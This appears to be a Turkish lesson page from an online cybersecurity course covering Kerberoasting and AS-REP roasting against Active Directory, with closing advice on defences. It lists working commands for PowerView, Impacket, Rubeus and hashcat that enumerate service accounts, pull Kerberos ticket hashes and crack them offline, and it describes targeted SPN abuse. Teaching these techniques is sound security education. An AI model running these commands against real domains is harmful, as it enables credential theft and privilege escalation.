Cyber Security Academy · Ders

Kerberoasting ve AS-REP Roasting

Kerberos hizmet biletleri isteyin ve bunları Hashcat ile çevrimdışı olarak kırmayı deneyin.

3. ders / 413 adım

Kerberoasting ve AS-REP Roasting, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 3. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

Kerberos Bileti Şifrelemesi

Hizmet biletleri, hizmet hesabının parola karmasıyla şifrelenir. Herhangi bir etki alanı kullanıcısı herhangi bir SPN için hizmet bileti isteyebilir. Hizmet hesabının parolası zayıfsa bilet çevrimdışı kırılabilir.

Kerberos Bileti Kırma Nedir?

Kerberos bileti kırma saldırısı, Hizmet Asıl Adları (SPN'ler) bulunan hesaplar için hizmet biletleri ister, şifrelenmiş bileti çıkarır ve Hashcat ile çevrimdışı kırar. Yükseltilmiş ayrıcalık gerekmez — bunu herhangi bir etki alanı kullanıcısı yapabilir.

# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with Hashcat

SPN'leri Bulma

PowerView, Impacket veya yerel AD araçlarını kullanarak SPN'leri olan tüm hizmet hesaplarını numaralandırın. SPN'ler hizmet hesaplarını hizmetleriyle ilişkilendirir.

# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com

# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
  "(servicePrincipalName=*)" cn servicePrincipalName

Bilet İsteme ve Çıkarma

Rubeus (Windows) ve Impacket'ın GetUserSPNs'i (Linux), biletleri ister ve kırılabilir biçimde çıktı olarak verir.

# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
  -request -outputfile hashes.txt

Hashcat ile Kırma

Kerberos bileti kırma karmaları 13100 modunu kullanır (Kerberos 5 TGS-REP). En yüksek etkililik için kurallara sahip güçlü bir sözcük listesi kullanın.

# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule

# AES tickets: mode 19700 (AES128) or 19800 (AES256)

AS-REP Kırma Nedir?

AS-REP Kırma, Kerberos ön kimlik doğrulaması gerektirmeme ayarı etkin olan hesapları hedefler. AS, kullanıcının karmasıyla şifrelenmiş bir TGT döndürür — parola bilinmeden istenebilir ve çevrimdışı kırılabilir.

Ön Kimlik Doğrulaması Devre Dışı Hesapları Bulma

Ön kimlik doğrulaması olmayan hesaplar bir yanlış yapılandırmadır; çoğu zaman eski uygulamalardan kalır. Bunları PowerView veya GetNPUsers ile numaralandırın.

# PowerView
Get-DomainUser -PreauthNotRequired

# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
  -dc-ip dc.corp.com -format hashcat -outputfile asrep.txt

# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txt

AS-REP Karmalarını Kırma

AS-REP karmaları Hashcat'in 18200 modunu kullanır. Kırma süreci Kerberos bileti kırmayla aynıdır — şifrelenmiş AS yanıtına karşı çevrimdışı sözlük saldırısıdır.

# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule

Etki Değerlendirmesi

Çıkarılmış hizmet hesabı parolaları çoğu zaman yükseltilmiş ayrıcalıklara sahiptir — veritabanı, yedekleme yazılımı veya Exchange çalıştıran hizmet hesapları etki alanı yöneticisi olabilir. AS-REP hesapları sıklıkla gözden kaçar ve zayıf biçimde korunur.

Hedefli Kerberos Bileti Kırma

Bir nesneye yazma erişiminiz varsa yüksek değerli bir hesaba geçici olarak SPN ekleyebilir, hesabın Kerberos biletini kırabilir, karmayı kırabilir ve ardından SPN'yi kaldırabilirsiniz — belirli hesapları isteğe göre hedeflemenizi sağlar.

Savunmalar

Kerberos bileti kırmaya karşı savunma için hizmet hesaplarında uzun, rastgele parolalar (25 veya daha fazla karakter) kullanın veya daha iyisi, otomatik olarak 120 karakterlik parolaları değiştiren Grup Yönetimli Hizmet Hesaplarını (gMSA) kullanın. AS-REP için tüm hesaplarda ön kimlik doğrulamayı etkinleştirin.

Hızlı Kontrol

AS-REP Kırmanın çalışması için hangi hesap özniteliği gereklidir?

Özet: Kerberos Bileti Kırma ve AS-REP Kırma

Her iki saldırı da kilitlenmeleri tetiklemeden parolaları çevrimdışı kırmak için Kerberos bileti şifrelemesindeki zayıflıklardan yararlanır. Kerberos bileti kırma, SPN hesaplarını hedefler (herhangi bir etki alanı kullanıcısı yapabilir); AS-REP kırma ise ön kimlik doğrulaması olmayan hesapları hedefler (kimlik bilgisi gerekmez). Hizmet hesapları için gMSA kullanın ve tüm kullanıcılarda ön kimlik doğrulamayı zorunlu kılın.

Başlamak ücretsiz

Yapay zeka eğitmeniyle Cyber Security Academy öğren — ücretsiz

Tarayıcında gerçek kod yaz ve çalıştır, 7/24 yapay zeka eğitmeninden anında yardım al; web'de ya da uygulamada kaldığın yerden devam et.

Kurslar
76
Dersler
303

Sıkça Sorulan Sorular

“Kerberoasting ve AS-REP Roasting” dersi ücretsiz mi?

Evet — “Kerberoasting ve AS-REP Roasting” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“Kerberoasting ve AS-REP Roasting” dersinde ne öğreneceğim?

Kerberos hizmet biletleri isteyin ve bunları Hashcat ile çevrimdışı olarak kırmayı deneyin. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 3. dersidir.

“Kerberoasting ve AS-REP Roasting” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Windows Kimlik Doğrulaması: NTLM ve Kerberos
  2. Pass-the-Hash ve Pass-the-Ticket Saldırıları
  3. Kerberoasting ve AS-REP Roasting
  4. Active Directory Güçlendirmesi
← Cyber Security Academy Sayfasına Dön